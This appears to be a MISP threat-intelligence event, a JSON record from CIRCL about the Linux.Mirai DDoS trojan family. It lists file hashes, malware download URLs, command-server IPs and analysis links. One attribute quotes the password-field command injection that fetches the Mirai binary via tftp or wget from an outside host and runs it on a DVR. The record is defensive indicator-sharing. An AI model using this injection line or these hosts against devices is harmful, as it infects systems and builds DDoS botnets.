2023-04-21 13:25:09 +00:00
{
"Event" : {
"analysis" : "2" ,
"date" : "2016-10-01" ,
"extends_uuid" : "" ,
"info" : "OSINT - Investigation of Linux.Mirai Trojan family" ,
"publish_timestamp" : "1475309596" ,
"published" : true ,
"threat_level_id" : "3" ,
"timestamp" : "1475309569" ,
"uuid" : "57ef6d48-20c8-4e55-9f02-468f950d210f" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#3b7500" ,
"local" : "0" ,
"name" : "circl:incident-classification=\"malware\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#004646" ,
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
} ,
{
"colour" : "#32003e" ,
"local" : "0" ,
"name" : "ms-caro-malware:malware-type=\"DDoS\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#670080" ,
"local" : "0" ,
"name" : "ms-caro-malware:malware-platform=\"Linux\"" ,
"relationship_type" : ""
} ,
{
"colour" : "#0088cc" ,
"local" : "0" ,
"name" : "misp-galaxy:tool=\"Mirai\"" ,
"relationship_type" : ""
}
] ,
"Attribute" : [
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475308942" ,
"to_ids" : false ,
"type" : "comment" ,
"uuid" : "57ef6d8e-6630-40f3-976b-4234950d210f" ,
"value" : "A Trojan for Linux that was named Linux.Mirai has several predecessors. The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87. At the beginning of August, a new version of this Trojan Linux.DDoS.89 was discovered. Finally, Doctor Web\u2019s security researchers investigated the \r\nLinux.Mirai Trojan found later that month."
} ,
{
"category" : "External analysis" ,
"comment" : "Dr.WEB - Investigation of Linux.Mirai Trojan family" ,
"data" : "<base64-encoded PDF attachment; the encoded content is garbled and truncated in the source and is omitted here>" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475308992" ,
"to_ids" : false ,
"type" : "attachment" ,
"uuid" : "57ef6dc0-16dc-4e4e-980b-4ebb950d210f" ,
"value" : "Investigation_of_Linux.Mirai_Trojan_family_en.pdf"
} ,
{
"category" : "Payload delivery" ,
"comment" : "x86" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309027" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "57ef6de3-827c-4967-9708-42ce950d210f" ,
"value" : "c129e2a23abe826f808725a0724f12470502a3cc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309027" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "57ef6de3-f1b0-4776-9e5a-4add950d210f" ,
"value" : "8fd0d16edf270c453c5b6b2481d0a044a410c7cd"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309027" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "57ef6de3-b284-456d-b74a-4b63950d210f" ,
"value" : "9ff383309ad63da2caa9580d7d85abeece9b13a0"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309209" ,
"to_ids" : true ,
"type" : "filename" ,
"uuid" : "57ef6e99-0a20-4839-a902-4e4d950d210f" ,
"value" : ".shinigami"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309292" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "57ef6eec-c238-49ec-a6f8-4521950d210f" ,
"value" : "http://5.206.225.122/bins/mirai.arm"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309307" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "57ef6efb-b9fc-498a-a704-4f7f950d210f" ,
"value" : "5.206.225.122"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309335" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "57ef6f17-16f4-4e11-b0ce-4e91950d210f" ,
"value" : "151.80.99.84"
} ,
{
"category" : "Payload delivery" ,
"comment" : "The malware was installed on a dvr and was started with this bash injection in password field" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309367" ,
"to_ids" : true ,
"type" : "comment" ,
"uuid" : "57ef6f37-5074-4e2b-85e6-4599950d210f" ,
"value" : "Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309391" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef6f4f-8220-43c7-912c-4818950d210f" ,
"value" : "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4477"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "57ef7002-6900-46c9-ac17-465d02de0b81" ,
"value" : "f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "57ef7002-0194-4671-b962-44fa02de0b81" ,
"value" : "78440b86e34579001bea6ebc600751f5"
} ,
{
"category" : "External analysis" ,
"comment" : "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef7002-0738-471a-8108-4e7502de0b81" ,
"value" : "https://www.virustotal.com/file/f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc/analysis/1465114448/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309570" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "57ef7002-2174-4783-bf9b-4e0a02de0b81" ,
"value" : "7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc"
} ,
{
"category" : "Payload delivery" ,
"comment" : "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "57ef7003-6fac-4d16-86e4-411502de0b81" ,
"value" : "e64079b3ccf906204474beca1f5cc41d"
} ,
{
"category" : "External analysis" ,
"comment" : "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef7003-9390-423a-a424-4b2a02de0b81" ,
"value" : "https://www.virustotal.com/file/7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc/analysis/1464739147/"
} ,
{
"category" : "Payload delivery" ,
"comment" : "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "57ef7003-e8e4-4eee-b196-4b8e02de0b81" ,
"value" : "45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56"
} ,
{
"category" : "Payload delivery" ,
"comment" : "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "57ef7003-2388-4060-a02f-48c602de0b81" ,
"value" : "5d25f735cf059d6b4076947860da5c45"
} ,
{
"category" : "External analysis" ,
"comment" : "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1475309571" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "57ef7003-07c0-4d57-a1d9-4a2d02de0b81" ,
"value" : "https://www.virustotal.com/file/45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56/analysis/1465114403/"
}
]
}
}